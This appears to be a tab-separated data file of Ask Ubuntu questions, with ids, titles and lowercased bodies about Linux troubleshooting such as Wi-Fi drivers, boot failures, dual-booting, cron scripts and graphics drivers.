411272	i think i shuold use ubuntu 10.10	ubuntu 13.10 is a system of frequent collapse.but ubuntu 10.10 is quite stable.who can give me some advice ?
411276	battery issues - lenovo ideapad z460	i 've been using ubuntu 13.10 on my lenovo for more than 5 months without a problem . yesterday i disconnected the ac adapter to take the laptop with me to the couch and it simply shut down . so i reconnected it to at least be able to check what was going on and , to my surprise , the os seems to be recognizing the battery as it always did . this is the result of dumping upower : device : /org/freedesktop/upower/devices/line_power_acad native-path : acad power supply : yes updated : sun 26 jan 2014 08:48:06 pm est ( 757 seconds ago ) has history : no has statistics : no line-power online : yes device : /org/freedesktop/upower/devices/battery_bat1 native-path : bat1 vendor : compal model : pabas024 serial : 3658q power supply : yes updated : sun 26 jan 2014 09:00:40 pm est ( 3 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : charging energy : 23.99 wh energy-empty : 0 wh energy-full : 31.16 wh energy-full-design : 48.84 wh energy-rate : 0 w voltage : 11.848 v percentage : 76 % capacity : 63.8002 % technology : lithium-ion daemon : daemon-version : 0.9.22 can-suspend : yes can-hibernate : no on-battery : no on-low-battery : no lid-is-closed : no lid-is-present : yes is-docked : no yet , i still ca n't use the battery ... it 's as if the os knew the battery was there but could n't switch to it whenever the ac adapter is disconnected . the battery icon , by the way , is always full . specs : lenovo ideapad z460 intel core i5 cpu m 480 @ 2.67ghz ă 4 ubuntu 13.10 ( 64-bit )
411284	l2tp over ipsec & openvpn server on same ubuntu server	has anyone tried to run a l2tp/ipsec server alongside an openvpn server on one single ubuntu machine successfully without using virtualization ? have n't been able to find any information on this so far . thanks !
411291	ca n't click inside any window application !	i installed ubuntu 12.04 lts . i can click to open an application like firefox or libreoffice writter and once the app opens i ca n't click inside ... i ca n't click open or close , or refresh or anything . one work around is i can log out and log in and now i can click but i have to log out every time i turn the pc on . if i use firefox browser it will freeze the system within 2 min . tried downloading chromium just to go online but while downloading chromium the system freeze again . btw if i log out and log in and i do n't use the internet everything will work fine . just downloaded and reinstalled ubuntu again with the same issue . in the virtualbox ubuntu just works fine but when i install it on a test pc i have the issue is there .
411322	ubuntu terminal commands and usage	i just got ubuntu 12.04 yesterday and would like to learn how to use the terminal . the reason why is because i 'm a developer and i 'm trying to get any applications i develop supported on linux . from what i understand the teminal is a big part of developing on linux . if any information is needed i 'm programming in c++ in the code : :blocks ide . i 'm having troubles finding tutorials on how to use it , especially for development cases .
411328	floppy drive only works one way	i have no trouble copying files from the floppy drive but when i try to drag files to the floppy drive they move right back to the source folder without being copied . these are small files , well within the capacity of the floppy disk . what am i doing wrong ?
411345	edimax ew-7811un connects to wifi , but not to internet	new to ubuntu and just installed version 12.04 ! my edimax wifi adapter is new too . i tried it out on my windows 7 partition and had a similar problem which i was able to resolve by changing the `` wireless mode '' to ieee 802.11 b/g ( from ieee 802.11 b/g/n ) . is there any way for me to do the same thing in ubuntu or any other fix ?
411348	installing java on ec2 instance -- unzip error	i 've been trying to install java for a while now on my ec2 instance and i 'm having no luck . i keep getting the error : sudo tar xf jdk-7u51-linux-x64.tar.gz gzip : stdin : not in gzip format tar : child returned status 1 tar : error is not recoverable : exiting now i can not get this to work with zxf or xf.. i have tried renaming it to .tar but then i get this does not look like a tar archive.. any suggestions ? thanks in advance for any help ! **i am running a 64 bit instance file jdk-7u51-linux-x64.tar.gz jdk-7u51-linux-x64.tar.gz : html document , ascii text , with very long lines , with crlf line terminators my checksum is bad ... 81ee08846975d4b8d46acf3b6eddf103 jdk-7u51-linux-x64.tar.gz should be ( by oracle.com ) : dk-7u51-linux-x64.tar.gz 764f96c4b078b80adaa5983e75470ff2 how do i fix this ? i 've tried re-downloading and it has not fixed the problem . i also get the wrong sum when trying to download the 32 bit version . wget is not downloading the file correctly . so i 'm going to look into that . if anyone has an idea before i find it , it will of course be much appreciated . -- it 's downloading a text file ( of html ) .
411355	lost boot from usb/cd options	i recently installed ubuntu , trying to put it in another partition and it overwrote my entire windows drive . i want to install windows 7 again now , however , i have no options in my boot menu now to boot from cd/dvd drive , or usb drive . my only options in the bios boot menu are two ubuntus ( both of which boot the same install ) . i have the ability to add a boot options however . i have to set a boot path , and choose a file system . there 's only one file system option so all that i would need to figure out is the boot path to create a cd/usb boot option . any ideas ? edit finally figured it out , i got into the system setup ( which is what i thought was bios , but i guess it 's the efi ) . had to enable `` launch csm '' under the boot menu , and disable `` secure boot control '' under the security menu . save and exit , go back to the system setup and the cd option was back again . whew !
411356	how to import contacts into thunderbird ?	how to import contacts from a vcard file ( *vcf ) into thunderbird mail client ?
411362	problems with adding a dvd drive	i have ubuntu 12.04lts , it is a new machine , but i did not have an optical drive when i built it . i just added a dvd drive today , and i 'm trying to get things going but i 'm running into problems . in most of my searches ( dealing with playing dvd movies ) i noted that there should be a folder in /dev/dvd i do not have such a folder , so i 'm wondering if that is a problem and if so , how to fix it ? it seems when i search forums and even askubuntu everyone just assumes this folder is there already . edit for further clarification : the drive is recognized , but when a disk is inserted it appears in the /media folder instead of the dev/dvd folder . i can search for files on the disk with mplayer and get it to play , but it does n't just play if i choose it from the menu when the disk is inserted ( mplayer or vlc ) . i can not get a movie to play at all with vlc player . vlc gives me an error that reads `` vlc could not read the file ( input/output error ) . according to my research so far , i have all of the proper codecs installed , and like i said i can force it to play in mplayer so i do n't believe codecs are the issue .
411372	ubuntu 12.04 unity starts in 2d mode even when 3d is selected - ati radeon hd 4250 legacy driver 13.1	after installing the ati radeon legacy drivers ( version 13.1 ) unity no longer starts in 3d mode , where it did before . i can select `` ubuntu '' during login , and indeed it is the default choice , but when i do login unity loads 2d mode instead of 3d mode . i can not get unity to start in 3d at all , even after running unity -- reset . the output of lscpi | grep vga is as follows : 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs880m [ mobility radeon hd 4225/4250 ] i tried some of the solutions in the post damien mentioned below , including reverting back to open source drivers . no luck , as /usr/lib/nux/unity_support_test -p returns `` not software rendered '' as `` no '' . but unity 3d had always worked until just the other day . so how do i get it to software render ?
411375	deduplication using sdfs file system	i am trying deduplication with sdfs . ( ubuntu 13.10 on vm ) . ( http : //opendedup.org/quickstart ) followed the same steps as this mounted the file system on /media/pool0/ when copied a directory containing some similar pdf 's its not removing the duplicates and the size of the folder remains the same as the original . original directory size 1.6g /worksheet/ 1.6g total sdfs directory size 1.7g /media/pool0/worksheet/ 1.7g tota is there any specific commands for enabling deduplicaiton feature in the sdfs volume . or will dedpulication get applied to the files that we copy into the volume. ? can some1 please also explain me how sdfs file system works ? thanks in advance
411376	ubuntu 12.10 : wifi card bcm43142 not working	i 'm having troubles with my broadcom wireless adapter bcm43142 . i tried this solution : help i haved no wireless sinced installing updates on 12.10 ( the 2nd one , because the wifi card does not appear in the additional drivers tab ) , and since http : //jas.gemnetworks.com/ is under maintenance , every related answer is not useful for me . the fact is that i got an error when trying to retry as @ chili555 suggested in many posts - i have dell inspiron 3421 ( 14 ) with ubuntu 12.10 \ # my network card ** $ lspci | grep network** 06:00.0 network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 ) ** $ lspci -k** \ # * [ ... ] only showing network related settings - i truncated this part* 06:00.0 network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 ) subsystem : dell wireless 1704 802.11n + bt 4.0 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) subsystem : dell device 0591 kernel driver in use : r8169 kernel modules : r8169 \ # current kernel ** $ uname -r** 3.5.0-45-generic \ # current linux-source package ** $ dpkg -l | grep linux-source** ii linux-source 3.5.0.45.61 all linux kernel source with ubuntu patches ii linux-source 3.5.0.45.68 all linux kernel source for version 3.5.0 with ubuntu patches \ # installing headers ( will install .45.61 ) ** $ sudo apt-get install linux-headers-generic** leyendo lista de paquetes ... hecho creando árbol de dependencias leyendo la información de estado ... hecho se instalarán los siguientes paquetes nuevos : linux-headers-generic 0 actualizados , 1 se instalarán , 0 para eliminar y 0 no actualizados . se necesita descargar 0 b/2.264 b de archivos . se utilizarán 32,8 kb de espacio de disco adicional después de esta operación . seleccionando paquete linux-headers-generic previamente no seleccionado ( leyendo la base de datos ... 218452 ficheros o directorios instalados actualmente . ) desempaquetando linux-headers-generic ( de ... /linux-headers-generic_3.5.0.45.61_amd64.deb ) ... configurando linux-headers-generic ( 3.5.0.45.61 ) ... \ # how my headers are ** $ dpkg -l | grep linux-headers** ii linux-headers-3.4.0-030400 3.4.0-030400.201205210521 all header files related to linux kernel version 3.4.0 ii linux-headers-3.4.0-030400-generic 3.4.0-030400.201205210521 amd64 linux kernel headers for version 3.4.0 on 32 bit x86 smp ***edit : uninstalled 3.4.\* headers but got the same error*** ii linux-headers-3.5.0-45 3.5.0-45.68 all header files related to linux kernel version 3.5.0 ii linux-headers-3.5.0-45-generic 3.5.0-45.68 amd64 linux kernel headers for version 3.5.0 on 64 bit x86 smp ii linux-headers-generic 3.5.0.45.61 amd64 generic linux kernel headers \ # reinstalling bcmwl ... trying , it fails at the end ** $ sudo apt-get install -- reinstall bcmwl-kernel-source** leyendo lista de paquetes ... hecho creando árbol de dependencias leyendo la información de estado ... hecho 0 actualizados , 0 se instalarán , 1 reinstalados , 0 para eliminar y 0 no actualizados . se necesita descargar 0 b/1.181 kb de archivos . se utilizarán 0 b de espacio de disco adicional después de esta operación . ( leyendo la base de datos ... 218455 ficheros o directorios instalados actualmente . ) preparando para reemplazar bcmwl-kernel-source 5.100.82.112+bdcom-0ubuntu3 ( usando ... /bcmwl-kernel-source_5.100.82.112+bdcom-0ubuntu3_amd64.deb ) ... removing all dkms modules done . desempaquetando el reemplazo de bcmwl-kernel-source ... configurando bcmwl-kernel-source ( 5.100.82.112+bdcom-0ubuntu3 ) ... loading new bcmwl-5.100.82.112+bdcom dkms files ... building only for 3.5.0-45-generic building for architecture x86_64 building initial module for 3.5.0-45-generic done . wl : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.5.0-45-generic/updates/dkms/ depmod ... . dkms : install completed . error : module b43 does not exist in /proc/modules error : module b43legacy does not exist in /proc/modules error : module ssb does not exist in /proc/modules error : module bcm43xx does not exist in /proc/modules error : module brcm80211 does not exist in /proc/modules error : module brcmfmac does not exist in /proc/modules error : module brcmsmac does not exist in /proc/modules error : module bcma does not exist in /proc/modules update-initramfs : deferring update ( trigger activated ) procesando disparadores para initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-45-generic ** $ ** suggestions will be appreciated a lot : $ .
411380	i have tor installed but can not open onion websites . ubuntu 13.04	i can run the tor browser bundle and it works fine for opening regular websites , but whenever i try to open onion websites , they just time-out . i am running the 32-bit version of ubuntu , and i do n't know much about linux in general , other than how to navigate the folders with commands , such as ls , cd , rm and the like .
411384	virtualbox vt-x/amd-v	i 'm trying boot windows 7 from virtualbox . but keep getting errors about t-x/amd-v . i tried disabling it says that it 's non optimal setting . i was trying bunch of settings to get it to work but i keep that error . i got this error : vt-x/amd-v hardware acceleration has been enabled , but is not operational . your 64-bit guest will fail to detect a 64-bit cpu and will not be able to boot . please ensure that you have enabled vt-x/amd-v properly in the bios of your host computer .
411385	broadcom wireless and realtec audio driver problem in linux mint 16 petra	how can i install my wireless and audio driver in linux mint using command line ?
411387	do i have a virus ?	i downloaded and ran the script located at http : //www.pendrivelinux.com/multiboot-create-a-multiboot-usb-from-linux/ does my system have a virus is that a safe site do use ? ? ? i have checked using clam av and i did run a rootkit scan ... i am worried because after i updated m system and shut it down , it showed a terminal session going when i started up i do n't have the terminal log because i do n't know how to retrieve it ... ... . maybe it is nomal for a sysytem to check itself at boot time after it updates ? ? ? ?
411389	how can i get the ubuntu installer to recognise my primary partition for dual-booting ?	when i select `` install ubuntu alongside windows 7 '' , the only partition available is my 20 gb recovery drive . how do i get the ubuntu installer to recognize my primary 600 gb harddrive and create a partition there ?
411390	not finding xampp in ubuntu software center ?	hi all i 'm trying to install xampp but i am unable to do it . i searched many things but wont work for me . i dont know what is happening in my system because even the ubuntu center is unable to find the xampp and lampp both . what should i do now . how can i install xampp in my system if the terminal is not taking any command . i am a new in ubuntu using first time . any help will be greatfull . thanks .
411392	undelete : access is denied because the ntfs volume is already exclusively opened	i need to restore some files deleted from pratition . ben @ ben-v5-171 : ~ $ sudo ntfsundelete /dev/sdb1 access is denied because the ntfs volume is already exclusively opened . the volume may be already mounted , or another software may use it which could be identified for example by the help of the 'fuser ' command . you can use force option to avoid this check , but this is not recommended and may lead to data corruption . ben @ ben-v5-171 : ~ $ fuser /dev/sdb1 ben @ ben-v5-171 : ~ $ sudo fuser /dev/sdb1 ben @ ben-v5-171 : ~ $ lsof /dev/sdb1 ben @ ben-v5-171 : ~ $ sudo lsof /dev/sdb1 lsof : warning : ca n't stat ( ) fuse.gvfs-fuse-daemon file system /home/ben/.gvfs output information may be incomplete . ben @ ben-v5-171 : ~ $ edit i had to manually umount device . ps finaly , the best way to restore files in my situation was this one : ben @ ben-v5-171 : ~/tmp/flash $ sudo dd if=/dev/sdb1 of=fl.img bs=1024 ben @ ben-v5-171 : ~/tmp/flash $ tsk_recover -e fl.img files/
411393	boot loop on windows 8.1 dual boot with ubuntu 12.04	i have a dell xps 15 l502x running windows 8.1 on the onboard hdd . i 've installed ubuntu 12.04 on my external hard drive , with grub boot menu.however when i try to boot into windows 8.1 , it goes into an infinite boot loop with windows trying to diagnose the problem and telling me to restart .
411394	automatic synchronization or backup to external hdd at every plugin	i used to backup one partition to an external drive using grsync but now i have to backup different different folders to corresponding folders in external hdd . it would be helpful if they can be automated on every plug-in of hdd using corn or alike or with whatever app.. thanks for your time . edit : i am not a big pro in coding so i may need the solution in a continuous way to apply it practically successfully . and i also need completely automatic solution if possible . this link may have the answer but because of it 's discontinuous nature it is very difficult for me to filter the appropriate actions needed to get my desired work done . thanks again .
411395	installation problem of linux os on my lenovo laptap	recently i bought a new lenovo laptap ( b490 , intel pentium,2gb ram ) . firstly i installed windows 7 os , then i installed ubuntu 10.04 as side by side.in that i faced a problem of getting sound even i installed plugins , so i erased and installed ubuntu 13.04 ( and i shared files from windows to linux and linux to windows and connected internet through netsetter ) after four hours my os got jammed.then i restarted it and it showing that the error as : /sbin/init : error while loading shared libraries : libnih.so.1 : can notopen shared object file : no such file or directory [ 2.558767 kernel panic-not syncing : attempt to kill init showing some other errors ( not mentioned here ) , and after that i reinstalled it again , after couple of hours usage i got same problem , then i erased complete os ( including windows7 ) and installed ubuntu 12.04 and i found same problem . what i have to do with it ? , i tired and screwed up on installations . pls help me ... ... ... ... .
411397	thinkcentre automatically restart after turned off	i installed ubuntu 12.04 into my thinkcentre m83 . the problem is everytime i shut down the system , after one second , it automatically restarts . is there any one that can fix the problem ? many thanks !
411398	dpkg-source : error : ca n't build with source format '3.0 ( native ) ' : native package version may not have a revision	i 'm encountering this strange issue when using this launchpad recipe . the source package fails to build with this error message in the buildlog : dpkg-source -i -i -b recipe- { debupstream } -0~ { revno } dpkg-source : error : ca n't build with source format '3.0 ( native ) ' : native package version may not have a revision dpkg-buildpackage : error : dpkg-source -i -i -b recipe- { debupstream } -0~ { revno } gave error exit status 255 it seems to be happening only for trusty , but i suspect that this is a more general packaging issue . the debian/changelog contains this entry : xfce4-appmenu-plugin ( 0.10-1 ) unstable ; urgency=low * initial release ( closes : # nnnn ) < nnnn is the bug number of your itp > -- [ maintainer ] tue , 15 nov 2011 14:02:29 +0800 any ideas what is going wrong ?
411399	libcld.so.0 : can not open shared object file : no such file or directory error when using cld	i am getting this error while trying to use cld : libcld.so.0 : can not open shared object file : no such file or directory i 'm using python 2.7 on ubuntu 12.04 .
411401	how to install ubuntu on new preloaded dos system ?	recently i bought new laptop without operating system in it.it has only freeloaded dos that 's it.now i made a boot-able usb drive with ubuntu in it.it went to fourth step properly with out any issue , but the problem is after that its not detecting the internet connection even though i already connected using wired connection . give me any suggestions to load ubuntu on my new laptop . model : dell inspiron 15 , i3 3251
411403	in ubuntu matlab execution file can not be run	i have stored my matlab installation in one of the partitions.but ubuntu does n't recognize the matlab file as an executable file even after executing chmod +x command . kindly help me to resolve the problem
411404	update 10.04 to 12.04	in home pc ubuntu 10.04 installed and no internet connection . i want to update it to 12.04. i want download from my office pc ( it is connected with internet ) can i download only updated portion not entire os .
411405	computer not starting	i had downloaded wubi and ubuntu for 32 bit version and had kept them in the same folder.i clicked on ubuntu to try to intialize it but nothing happenned.so i thought the file may have been corrupted . later i shut down my computer after doing other work on it.when i tried to open my computer again i saw that it wouldnot start and is showing me the msg that a software and hardware problem may have occured . it prompted me to safe boot or normal boot , but sadly none of them is working.when i click on these options the computer restarts again and i am again shown the same message and asked to choose how i would like to boot . also when i had openned my computer the first time after this problem i was prompted to do disk check , but yet after doing it i was again returned to the 1st scnrnr , with the same message .
411406	ubuntu 13.10 and lenovo video card	i have a old lenovo y510 . i was running windows 7 and ubuntu 12.04 it ran very well in either windows or ubuntu 12.04 but i never could find the drivers for the video card more specifically the s-video tv out wont work ... i use this old faithful laptop for a media center it plays movies and music quite well i still use it for work from time to time and it does well . point being i like this laptop we have been though hell together . i had hoped ubuntu 13.10 would have more updated drivers for that.. i have to run windows to connect this to my old tv via the s-video output . i would rather use ubuntu for all that . any clues ? or am i stuck using windows 7 or do i have to invest in a new tv with vga inputs ? was hoping to retire this computer to my entertainment center and let her live out her days that way as i have much newer more powerful computers i use for my work . please if anyone has any info help me keep my old friend in service . fyi she is running 4 gigs ram and a core 2 duo , 1 tb hybrid hard-drive . very fast for her age .
411407	how to improve tesseract performance ?	by all accounts , tesseract is superb . however , my results are dismal . i need to convert ( digital , as opposed to from a book ) text that i only have as a png . for instance : 2 3 academics 1 1711 2 3 achlmbobelmann 211 191—2 1 3 aoqusmono|food 1 171 n 5 afd.seeagem : efian§asededével 1 ( muessmm ) 3 4 allluence 211 i849 81 5 afnca 33:21 9.lz3l. $ 50z55 & 9l.93-4.9898100.ii8r2d.iz§£ this is from dark blue text against a white field . the original image can be found here . how can i do better ?
411408	update : libsdl1.2-dev on ubuntu12.4	i need to install libsdl1.2-dev for doing some graphics , but it is not allowed . the reason is : die folgenden pakete haben unerfüllte abhängigkeiten : libsdl1.2-dev : hängt ab von : libx11-dev soll aber nicht installiert werden hängt ab von : libglu1-mesa-dev soll aber nicht installiert werden hängt ab von : libpulse-dev soll aber nicht installiert werden hängt ab von : libxt-dev soll aber nicht installiert werden hängt ab von : libxext-dev soll aber nicht installiert werden e : probleme können nicht korrigiert werden , sie haben zurückgehaltene defekte pakete . update : einige pakete konnten nicht installiert werden . das kann bedeuten , dass sie eine unmögliche situation angefordert haben oder , wenn sie die unstable-distribution verwenden , dass einige erforderliche pakete noch nicht erstellt wurden oder incoming noch nicht verlassen haben . die folgenden informationen helfen ihnen vielleicht , die situation zu lösen : die folgenden pakete haben unerfüllte abhängigkeiten : libpulse-dev : hängt ab von : libpulse0 ( = 1:1.1-0ubuntu15 ) aber 1:1.1-0ubuntu15.4 soll installiert werden hängt ab von : libpulse-mainloop-glib0 ( = 1:1.1-0ubuntu15 ) aber 1:1.1-0ubuntu15.4 soll installiert werden hängt ab von : libglib2.0-dev soll aber nicht installiert werden libx11-dev : hängt ab von : libx11-6 ( = 2:1.4.99.1-0ubuntu2.1 ) aber 2:1.4.99.1-0ubuntu2.2 soll installiert werden empfiehlt : libx11-doc soll aber nicht installiert werden e : probleme können nicht korrigiert werden , sie haben zurückgehaltene defekte pakete . mp @ ubuntu : ~ $ sudo apt-get install libsdl1.2-dev libx11-dev libglu1-mesa-dev libpulse-dev libxt-dev libxext-dev paketlisten werden gelesen ... fertig abhängigkeitsbaum wird aufgebaut statusinformationen werden eingelesen ... fertig einige pakete konnten nicht installiert werden . das kann bedeuten , dass sie eine unmögliche situation angefordert haben oder , wenn sie die unstable-distribution verwenden , dass einige erforderliche pakete noch nicht erstellt wurden oder incoming noch nicht verlassen haben . die folgenden informationen helfen ihnen vielleicht , die situation zu lösen : die folgenden pakete haben unerfüllte abhängigkeiten : libpulse-dev : hängt ab von : libpulse0 ( = 1:1.1-0ubuntu15 ) aber 1:1.1-0ubuntu15.4 soll installiert werden hängt ab von : libpulse-mainloop-glib0 ( = 1:1.1-0ubuntu15 ) aber 1:1.1-0ubuntu15.4 soll installiert werden hängt ab von : libglib2.0-dev soll aber nicht installiert werden libx11-dev : hängt ab von : libx11-6 ( = 2:1.4.99.1-0ubuntu2.1 ) aber 2:1.4.99.1-0ubuntu2.2 soll installiert werden empfiehlt : libx11-doc soll aber nicht installiert werden e : probleme können nicht korrigiert werden , sie haben zurückgehaltene defekte pakete .
411409	connecting sublime_text3 editor with postgresql	i am new in sublime_text3 . i want to connect my sublime_text editor with my system postgresql in ubuntu12.10 . i have tried few plugins but its not working . any one have any idea how to do that ?
411410	ubuntu 12.04 lts wo n't boot , stuck on black screen	i recently installed ubuntu 12.04 on my hp520 laptop , it was successfully installed but when i restarted it , it only showed me a purple screen , then black , then bongo sounds . i 'm new to ubuntu and really loved the interface and reviews from other users . i just wish i can fix this and move on so i can really enjoy ubuntu . i have an hp520 laptop ( hp530 in the us ) , 5 years old , former windows 7 installed . it purely runs ubuntu os . could graphics be the answer to this ? because if i go to recovery mode and continue booting from there , i can go to my login page and everything works fine . but if i restarted it and just let it boot , i get stuck on the black screen . any help would greatly be appreciated .
411419	how do i check which key is pressed ?	on my keyboard-layout the left ctrl-key is not working ( the right works normal ) . how can i check if another key is ordered to that key ? i once had a commandline tool that i could start and there it showed me every input that came whatever key i pressed , but i can not find it anymore . if i find out , that it works , i want to remap the correct key to my left ctrl-key
411422	install ubuntu on a pc with windows 8 ( had xp before upgrading to 8 ) directly making it a dual boot ?	i expected much from the new windows 8 . sadly it sucks . now i want to install ubuntu server edition ... should i uninstall win 8 first , the install xp , and the install ubuntu as a dual boot ? or , should i directly install ubuntu with win 8 as a dual boot ?
411423	how to give a specific user access only to a specific folder and its contents ?	i used adduser < name > and created a new user , andrew . now i want to give him read/write access only to /var/www/sitename.com and its contents . how am i supposed to do this ? i tried sudo chown andrew /var/www/sitename.com but he is still able to see all the folders and files under /var/www and other directories .
411430	open the parent folder of a symbolic link via right-click ?	we can open a parent folder of any file using nautilus script like # ! /bin/bash nautilus `` $ 1 '' if i do this script on symbolic link which is on the ~/desktop , then it will open the desktop itself . how can i recode this script to open the parent of actual file symbolic link is bound to ? for example , if i have a sym link file desktop/my-doc.doc linking to the doc file located in /media/myharddisk/my-doc.doc , the script will open /media/myharddisk/ and not ~/desktop in nautilus .
411431	blank screen appears at login soon after the ubuntu installation	i installed ubuntu onto my d drive with a 20 gb of formatted space . upon completing the installation i rebooted the system and suddenly on admin page when i was about to enter the password drumming sound started and i got blank screen . repeatedly i am getting the same thing and unable to use ubuntu . please advise !
411433	disk partition on ubuntu server 12.10	i 'm new on ubuntu . currently i 'm trying to install ubuntu server 12.10 on acer ar320 f1 with 300gb sas hdd . when i 'm in the disk partition section , it only shows me 3 choices which are : - configure iscsi volumes - undo changes to partitions - finish partitioning and write changes to disk . selecting iscsi will prompt about the ip address and port to connect , selecting undo changes will make it hang and selecting the finished partitioning will prompt root error . as i googled , most of the people talking about raid . how do i get the installer to recognize this sas hdd and let me continue with the installation ? is there any solution about this ?
411436	not detecting wireless card in ubuntu 13.04 lenovo g580 laptop	earlier wifi was not working in ubuntu 13.04 lenovo g580 laptop then i installed some packages reboot my system.then no wifi setting s were their in all settings/network.earlier it was showing disconnected but now even this is not showing . this are my network properties av @ av-lenovo-g580 : ~ $ ifconfig eth0 link encap : ethernet hwaddr b8:88 : e3:8a:95:06 up broadcast multicast mtu:1500 metric:1 rx packets:130652 errors:0 dropped:37 overruns:0 frame:0 tx packets:8867 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:19859927 ( 19.8 mb ) tx bytes:1388221 ( 1.3 mb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:687 errors:0 dropped:0 overruns:0 frame:0 tx packets:687 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:75625 ( 75.6 kb ) tx bytes:75625 ( 75.6 kb ) av @ av-lenovo-g580 : ~ $ sudo lshw -class network [ sudo ] password for av : sorry , try again . [ sudo ] password for av : *-network description : ethernet interface product : ar8162 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 10 serial : b8:88 : e3:8a:95:06 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx driverversion=1.2.3 firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:16 memory:90500000-9053ffff ioport:2000 ( size=128 ) *-network unclaimed description : network controller product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory:90400000-90403fff
411438	problems after reinstalling and repartitioning , ubuntu not running	i had installed ubuntu on my 32gb ssd and everything was fine until i figured i should try to use my 500gb hdd for something . so i ran ubuntu from my usb , went on the installation guide , repartitioned my ssd to have 30gb for / with ext4 and 2gb of swap . and then made the 500gb hdd my ext4 /home partition . after the whole installation process the result of the reboot was the following which only flashes for a second before going to the usb boot , i managed to take a picture . i 'm using a lenovo u310 with 32gb sdd and 500gb hdd , with 4gb of ram . any help would be welcome . http : //imgur.com/vnlwei8 edit : i went ahead and deleted all partition and reinstalled ubuntu , making a partition ext4 / on the ssd for 30gb , a swap on the ssd of 2gb and then ext4 /home of 500gb in the hdd . after the installation after rebooting the same screen flashed for a second followed by another one which said : could not open `` \efi\boot\fallback.efi '' : 14 after a second of that , the boot from usb screen appears where the four options to try ubuntu and such appears . again any insight on what is wrong would be helpful .
411439	hybrid graphics nvidia and onboard intel	i am fairly new to ubuntu , so excuse if this is a stupid question . i am trying to get hybrid graphics to work . first let me explain my setup . i have a 26 '' samsung as my main screen connected to dvi on nvidia 560ti . i have 1 19 '' acer screen connected to my desktop onboard graphics dvi for monitoring . then i have a 42 '' proline tv on the hdmi port of the nvidia card . ubuntu version 13.10 nvidia driver version is 319.60 and also installed prime . in the nvidia settings it picks up all 3 monitors but only display on the intel screen . i have not made any changes to xorg.conf as i am not sure what to insert . is this where my problem is or am i missing something else ? here is a screenshot of my nvidia settings : any help will be highly appreciated .
411441	how do i install bumblebee and cuda ?	i 'm trying to get cuda running on my dell precision m6700 laptop . i use ubuntu 12.04 for the moment but i can switch to a newer version if it facilitates the installation of cuda . i just want cuda to run , i do n't really care about power management . after some reading i decided to install bumblebee because my laptop uses optimus , i followed the instructions here : https : //wiki.ubuntu.com/bumblebee i also updated the drivers to nvidia-319 driver . now i am unable to boot my computer with graphics ; i end up with a frozen prompt . i still have access to the terminal prompt in recovery mode but i do n't know where to look for errors . i tried things like apt-get remove -- purge nvidia* etc . how can i get the graphic mode working again to try something else ?
411442	cron not running script	i have a script that works when called : /usr/local/bin/myscript # this works fine permissions for the file are : -rwxr-xr-x 1 root root 155 jan 27 09:34 myscript i 've added a line to /etc/crontab : * * * * * root /usr/local/bin/myscript but cron does n't seem able to run this . the crontab has the path variable set : path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin the script is a mysqldump to the /var/tmp/ directory : # ! /bin/bash day=`date + % y % m % d` time=`date + % k % m` mysqldump test -u john -pxxxxxxx > /var/tmp/ $ day. $ time.test.sql i ca n't think what is wrong with this , but the script is n't running .
411443	bizarre problem setting up imap mail in thunderbird on ubuntu 13.10	ubuntu 13.10 . thunderbird 24.2.0 exchange ews provider 3.2.0-beta76 ( the latest version of the add-in ) . i use a hosted exchange mail account ( for several reasons - price and simplicity of synching between devices amongst others ) . thunderbird will only connect to imap mail servers . this hosted exchange mail has imap capability . if i set up the same version of thunderbird on windows 8 , everything connects and works perfectly ok including calendar , tasks and contacts . if however i try setting this up in ubuntu 13.10 , using the same version of thunderbird and the add-in , thunderbird fails to connect to the imap server with the error message `` account can not be verified - is the user name and password correct ? '' - which of course they are . if i try setting up imap mail access in evolution , the same error happens , so it 's not just thunderbird - it must be something in ubuntu . why should the windows version connect ok and the ubuntu version not ? anyone got any idea how i can fix this ? ( other imap accounts such as gmail work perfectly ok ... ... )
411445	raid setup for small application server ?	i want to setup a small application server running 12.04 , mostly running bioinformatics tools . the box has 16gb of ram and 12 core and 6x2tb sata disks . i need a system partition of , sat at least 1tb , and a data partition of the rest . read speed is more important than write speed , but this is primarily a calculation server , so neither is of the utmost importance . what would be a good raid setup ? ( i 'm planning on using mdadm ) . my initial idea was 2x2tb in raid 1 for the system partition , and 4xtb in raid 10 for the data partition .
411447	during ubuntu installation , why do we need to create home mount point	when we install ubuntu as a separate partition along windows , we create mount point for root . /home also resides inside /.then why do we need to create separate mount point for /home.what is the significance of this ? and also what is the difference between selecting primary and logical for the mount points ?
411449	black screen after login to system	first of all , please do not mark as duplicate of this question my computer boots to a black screen , what options do i have to fix it ? it 's not the same . i only see the black screen after i login to ubuntu . i can boot up and see the login screen . how can i fix this ? even reset it back .
411452	are my video drivers in use ?	i have a laptop with a nvidia 250m and xubuntu 12.04 lts , i have installed cuda 5.5 following this guide . i have a doubt . i have four drivers in `` additional driver '' but no one is marked as active and under the `` nvidia x server setting '' i read that i have installed the 319.37 . following this guide i have run the following in a terminal : sudo nvidia-xconfig the terminal response was that the config file was missing and it would be created a new one . after this i rebooted the pc but my doubt still remains , am i using the driver or have i only installed them ?
